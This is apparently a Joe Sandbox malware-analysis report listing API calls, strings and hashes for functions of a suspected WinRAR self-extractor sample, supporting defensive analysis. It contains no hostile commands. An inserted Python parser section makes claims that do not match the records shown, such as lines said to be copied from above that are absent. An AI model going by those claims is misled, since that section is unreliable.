                                                              • GetCurrentProcess.KERNEL32(00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002,00000000), ref: 00447E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002,00000000), ref: 00447E16
                                                              • ExitProcess.KERNEL32 ref: 00447E28
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 858fb8a8abe39c5e2d62041f73c4eff13e939e881f1d8d4932d353165cd5883f
                                                              • Instruction ID: 047be875d5f0e01aca56c336090aa5f40522fd5ba5756737bf251f9ecc6cfe2b
                                                              • Opcode Fuzzy Hash: 858fb8a8abe39c5e2d62041f73c4eff13e939e881f1d8d4932d353165cd5883f
                                                              • Instruction Fuzzy Hash: ECE04631000248ABDF026F21CD09A4A3F6AEB10787B104469F8098B232CB3ADE52CA88
                                                              APIs
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 3b568796536e41155c42f7a48d3d79a3dea4dc50cdf4b8077581b57862d1c4cb
                                                              • Instruction ID: 9a2b253fb3bd0d7ba4a18f12e148124ed333d9e854936e301b0f7a7d40f80960
                                                              • Opcode Fuzzy Hash: 3b568796536e41155c42f7a48d3d79a3dea4dc50cdf4b8077581b57862d1c4cb
                                                              • Instruction Fuzzy Hash: 19820B70B05165AEDF15DB60D881BFEB769AF05304F8841BFE8499B242CB385A84C768
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043B7E5
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0043B902
                                                              • TranslateMessage.USER32(?), ref: 0043B910
                                                              • DispatchMessageW.USER32(?), ref: 0043B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0043B93D
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0043B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0043B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043B9B1
                                                                • Part of subcall function 0043D453: _wcschr.LIBVCRUNTIME ref: 0043D45C
                                                                • Part of subcall function 0043D453: _wcslen.LIBCMT ref: 0043D47D
                                                              • SetFocus.USER32(00000000), ref: 0043B9B8
                                                              • _swprintf.LIBCMT ref: 0043BA24
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 0043D4D4: GetDlgItem.USER32(00000068,0047FCB8), ref: 0043D4E8
                                                                • Part of subcall function 0043D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0043AF07,00000001,?,?,0043B7B9,0045506C,0047FCB8,0047FCB8,00001000,00000000,00000000), ref: 0043D510
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043D51B
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043D529
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D53F
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043D559
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D59D
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0043D5AB
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D5BA
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D5E1
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004543F4), ref: 0043D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0043BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0043BA90
                                                              • GetTickCount.KERNEL32 ref: 0043BAAE
                                                              • _swprintf.LIBCMT ref: 0043BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0043BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0043BB43
                                                              • _swprintf.LIBCMT ref: 0043BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0043BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0043BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0043BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0043BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0043BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0043BCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0043BCEB
                                                              • _swprintf.LIBCMT ref: 0043BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,004535F4), ref: 0043BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0043BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0043BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0043BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043BE68
                                                              • _wcslen.LIBCMT ref: 0043BEBE
                                                              • _swprintf.LIBCMT ref: 0043BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0043BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0043BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0043BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0043BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0043BF85
                                                              • SetWindowTextW.USER32(00000000,0046A472), ref: 0043BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0043C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0043C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0043C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0043C1D9
                                                                • Part of subcall function 0043C73F: __EH_prolog.LIBCMT ref: 0043C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043C1FD
                                                              Strings
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<C$STARTDLG$^C$__tmp_rar_sfx_access_check_%u$hC$winrarsfxmappingfile.tmp$QE
                                                              • API String ID: 3829768659-76735193
                                                              • Opcode ID: 6f1aff7a0a8bbe25b9fc51cea1ea52ed714ace5da278914dc129a5f50c707982
                                                              • Instruction ID: 25c1a18b62a10a52d22257ccced6d028f09b6b53c0fc67a6c72c139df0f22fe1
                                                              • Opcode Fuzzy Hash: 6f1aff7a0a8bbe25b9fc51cea1ea52ed714ace5da278914dc129a5f50c707982
                                                              • Instruction Fuzzy Hash: EA42F570940254BEEB219B719C4AFBF376CAB09B05F00116BF644B61D2DBBC5E448B6E

                                                              Control-flow Graph
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0043087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0043088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004308BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00430B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00430B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00430B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<E,00000000), ref: 00430BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00430C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00430C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<E,?,00000000,?,00000800), ref: 00430C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,|<E,00000800,?,00000000,?,00000800), ref: 00430C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,D=E,00000800), ref: 00430CD8
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • _swprintf.LIBCMT ref: 00430D4A
                                                              • _swprintf.LIBCMT ref: 00430D96
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • AllocConsole.KERNEL32 ref: 00430D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00430DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00430DAF
                                                              • _wcslen.LIBCMT ref: 00430DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00430DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00430DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00430DE7
                                                              • FreeConsole.KERNEL32 ref: 00430DED
                                                              • ExitProcess.KERNEL32 ref: 00430DF5
                                                              Strings
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: (=E$,<E$,@E$0?E$0AE$4BE$8>E$D=E$DXGIDebug.dll$H?E$H@E$HAE$P>E$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=E$`@E$d?E$dAE$dwmapi.dll$h=E$h>E$kernel32$uxtheme.dll$|<E$|?E$|@E$<E$>E$?E$@E$AE
                                                              • API String ID: 1207345701-976991200
                                                              • Opcode ID: d7c879ffad46ee6c7a50f746746c41765999fdc01d7f57a130a21c4d86b2d644
                                                              • Instruction ID: 8c7ae804b1468caff33ffe662d6dd5588c606d7889e9ca4e26e3ad3569df656e
                                                              • Opcode Fuzzy Hash: d7c879ffad46ee6c7a50f746746c41765999fdc01d7f57a130a21c4d86b2d644
                                                              • Instruction Fuzzy Hash: 3DD1A5B1008344ABD321DF50C859B9FBBF8AB8574BF50991FF9859A242C778864CCB5E

                                                              Control-flow Graph
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043C744
                                                                • Part of subcall function 0043B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0043B3FB
                                                                • Part of subcall function 0043AF98: _wcschr.LIBVCRUNTIME ref: 0043B033
                                                              • _wcslen.LIBCMT ref: 0043CA0A
                                                              • _wcslen.LIBCMT ref: 0043CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0043CA71
                                                              • _wcslen.LIBCMT ref: 0043CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0043CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0043CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0043CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,0046A472), ref: 0043CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0043CC7F
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$<C$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$C
                                                              • API String ID: 986293930-154417772
                                                              • Opcode ID: 7e0a01ed817db9bd5dfc9fc2d50b0ce2d06dc278f5b5b67dae0ddb5136def968
                                                              • Instruction ID: 99bcfaf7b6b88d183cc64c69be7566cbc43b92583e99ca806a8c2c2475466cc5
                                                              • Opcode Fuzzy Hash: 7e0a01ed817db9bd5dfc9fc2d50b0ce2d06dc278f5b5b67dae0ddb5136def968
                                                              • Instruction Fuzzy Hash: E6E186B2900218AADF24DB61DC85EEF73BC9F08751F5050ABF945E7140EB789E848F69
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042DA70
                                                              • _wcschr.LIBVCRUNTIME ref: 0042DA91
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0042DAAC
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 00431B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0042BAE9,00000000,?,?,?,00010484), ref: 00431BA0
                                                              • _wcslen.LIBCMT ref: 0042DDE9
                                                              • __fprintf_l.LIBCMT ref: 0042DF1C
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9E
                                                              • API String ID: 557298264-3123697929
                                                              • Opcode ID: 7d7832be701759e19d170f6313ce2fba25e8094586f139b44f22764c2e070117
                                                              • Instruction ID: e2d1f5800a67539c2a8a3aba26d4bcd02a5c2a0805af0cba79b5ef39b816db46
                                                              • Opcode Fuzzy Hash: 7d7832be701759e19d170f6313ce2fba25e8094586f139b44f22764c2e070117
                                                              • Instruction Fuzzy Hash: B532E371A00228EBDF24EF65E841BEE77A4FF05704F90016BF90597281EBB99D85CB58

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              • GetDlgItem.USER32(00000068,0047FCB8), ref: 0043D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0043AF07,00000001,?,?,0043B7B9,0045506C,0047FCB8,0047FCB8,00001000,00000000,00000000), ref: 0043D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0043D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004543F4), ref: 0043D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: e723093fb9db128184b687543f88070a483748ef5f541d17f80a2008d9769c13
                                                              • Instruction ID: 3d8fe9ba195288c210bba02b37d1e9e0d4c01febecddd9b579a2f21675a87c9c
                                                              • Opcode Fuzzy Hash: e723093fb9db128184b687543f88070a483748ef5f541d17f80a2008d9769c13
                                                              • Instruction Fuzzy Hash: 7431B271145341BBD301DF209C4AFAF7BACEB86B0AF00492DF951961D1EB648A04877F

                                                              Control-flow Graph

                                                              • Basic blocks 43d78f-43d9f0. Internal calls: 43ec50, 443e13, 43fff0, 42b92d, 431fbb (twice), 42a231, 42b6c4, 43dc3b. API nodes: ShowWindow (43d91b-43d923, 43d9de-43d9e1), GetExitCodeProcess (43d950-43d961), CloseHandle (43d97b-43d987). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0043D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0043D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0043D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0043D959
                                                              • CloseHandle.KERNEL32(?), ref: 0043D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0043D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf$PDu<C$hC$rC
                                                              • API String ID: 36480843-3641375243
                                                              • Opcode ID: 1e89d63cc8de9449cc0a0021dc507f594e25a6f6e408b706f1a0b0794d1a19d1
                                                              • Instruction ID: aeb9d06a19033eb0b8d996b01c7f3a04b84d116a56906ec4f1c807f00a8bd21e
                                                              • Opcode Fuzzy Hash: 1e89d63cc8de9449cc0a0021dc507f594e25a6f6e408b706f1a0b0794d1a19d1
                                                              • Instruction Fuzzy Hash: 6C51F8B09043809AD731AF24F8447AB7BE4AF49744F04282FF9C597291E7789D84CB5E
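The function records on this page list every recovered API call with raw hexadecimal arguments, so a reviewer has to look up each constant by hand to see that the function above opens a file with OPEN_EXISTING and FILE_FLAG_SEQUENTIAL_SCAN, drives a rich edit control with EM_SETSEL and EM_GETCHARFORMAT, or hands control to another executable through ShellExecuteExW before polling GetExitCodeProcess. The following Python is an added example, not part of the Joe Sandbox report: it parses the "APIs" lines of these records into structured calls, names the constants for a handful of APIs from their documented Win32 values, and extracts the process-launching calls. The line format in LINE_RE is inferred from how the records render on this page (an assumption), the function and class names are mine, and SAMPLE_RECORD is a constructed subset copied from the records above.

```python
"""Parse Joe Sandbox per-function 'APIs' records into structured calls with named constants.
Added example for this report page; the line format below is inferred from the rendered records."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: a subset of the 'APIs' lines copied from the function records on this page.
SAMPLE_RECORD = """\
• GetDlgItem.USER32(00000068,0047FCB8), ref: 0043D4E8
• ShowWindow.USER32(00000000,00000005,?,?,?,0043AF07,00000001), ref: 0043D510
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D53F
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043D559
  • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000), ref: 0042995F
• SHAutoComplete.SHLWAPI(?,00000010), ref: 0043ABF9
• ShellExecuteExW.SHELL32(?), ref: 0043D8DE
• _wcslen.LIBCMT ref: 0043D7AE
"""

# One record line: optional "Part of subcall function ADDR:" prefix, Name.MODULE(args), "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Win32 values for the parameters this decoder names.
SW_CMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 5: "SW_SHOW"}
EDIT_MSG = {0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
            0x043A: "EM_GETCHARFORMAT", 0x0444: "EM_SETCHARFORMAT"}  # 0x4xx = WM_USER-based rich edit messages
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00000080: "FILE_ATTRIBUTE_NORMAL"}
SHACF = {0x01: "SHACF_FILESYSTEM", 0x10: "SHACF_FILESYS_ONLY"}
# APIs that start another process; the record at 0043D8DE shows the sample using one of them.
PROCESS_APIS = {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW", "CreateProcessA", "WinExec"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list             # int for 8-digit hex literals, None for '?', str for anything else
    ref: int               # address of the call instruction
    parent: Optional[int]  # set when the report lists the call as part of a subcall


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text: str) -> list:
    """Return an ApiCall for every line matching the record format; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), parent))
    return calls


def _lookup(value, table: dict, prefix: str) -> str:
    if value is None:
        return "?"
    if not isinstance(value, int):
        return str(value)
    return table.get(value, f"{prefix}{value:#x}")


def _flags(value, table: dict) -> str:
    """Split a bit mask into the names in `table`; bits not in the table are kept as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) or "0"


def decode(call: ApiCall) -> dict:
    """Name the parameters we know for this API. Only the real parameter positions are
    consulted, because Joe Sandbox prints further stack slots after the actual arguments."""
    a = call.args
    if call.name == "ShowWindow" and len(a) >= 2:
        return {"nCmdShow": _lookup(a[1], SW_CMD, "SW_")}
    if call.name == "SendMessageW" and len(a) >= 2:
        return {"Msg": _lookup(a[1], EDIT_MSG, "msg_")}
    if call.name == "CreateFileW" and len(a) >= 6:
        return {"dwCreationDisposition": _lookup(a[4], CREATE_DISPOSITION, "disp_"),
                "dwFlagsAndAttributes": _flags(a[5], FILE_FLAGS)}
    if call.name == "SHAutoComplete" and len(a) >= 2:
        return {"dwFlags": _flags(a[1], SHACF)}
    return {}


def process_launches(calls: list) -> list:
    """The calls that hand control to another executable."""
    return [c for c in calls if c.name in PROCESS_APIS]


def summarize(calls: list) -> list:
    """One line per call: address, API and decoded parameters; subcalls are indented."""
    lines = []
    for c in calls:
        decoded = ", ".join(f"{k}={v}" for k, v in decode(c).items())
        indent = "    " if c.parent is not None else ""
        lines.append(f"{indent}{c.ref:08X} {c.name}({decoded})")
    return lines
```

Running `summarize(parse_api_lines(SAMPLE_RECORD))` turns the record into lines such as `0042995F CreateFileW(dwCreationDisposition=OPEN_EXISTING, dwFlagsAndAttributes=FILE_FLAG_SEQUENTIAL_SCAN)`, and `process_launches` isolates the ShellExecuteExW call at 0043D8DE that the record at 43d78f pairs with GetExitCodeProcess and CloseHandle. Only the parameter positions of the real signature are decoded; everything Joe Sandbox prints after them is stack residue, not arguments, and treating it as such is the most common mistake when reading these records.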

                                                              Control-flow Graph

                                                              • Basic blocks 44a95b-44ab76. Internal calls: 44ef4c, 452010, 448e06, 44af6c, 44abc3, 43fbbc. API nodes: MultiByteToWideChar (44a99c-44a9c0, 44aa30-44aa43), WideCharToMultiByte (44ab2f-44ab3f). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00445695,00445695,?,?,?,0044ABAC,00000001,00000001,2DE85006), ref: 0044A9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0044AA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AB35
                                                              • __freea.LIBCMT ref: 0044AB42
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • __freea.LIBCMT ref: 0044AB4B
                                                              • __freea.LIBCMT ref: 0044AB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 63ea95898f3270ba7ccde3ee619b2dabce502c80d2a53572af4a51d8dab3fe89
                                                              • Instruction ID: 525d489a51f437fadd9e66c9858a7d44691e7d948e19fe12ed99bb97f1aa7dfe
                                                              • Opcode Fuzzy Hash: 63ea95898f3270ba7ccde3ee619b2dabce502c80d2a53572af4a51d8dab3fe89
                                                              • Instruction Fuzzy Hash: 50511B72640256AFFB258F64CC42EBFB7AADB44714F15462EFE04D6240DB38EC60C65A

                                                              Control-flow Graph

                                                              • Basic blocks 443b72-443c0b. Internal call: 446088. API nodes: LoadLibraryExW (443b95-443bb1, 443bd5-443be4), GetLastError (443bb3-443bbc), FreeLibrary (443c02-443c03). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00443C35,?,?,00482088,00000000,?,00443D60,00000004,InitializeCriticalSectionEx,00456394,InitializeCriticalSectionEx,00000000), ref: 00443C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
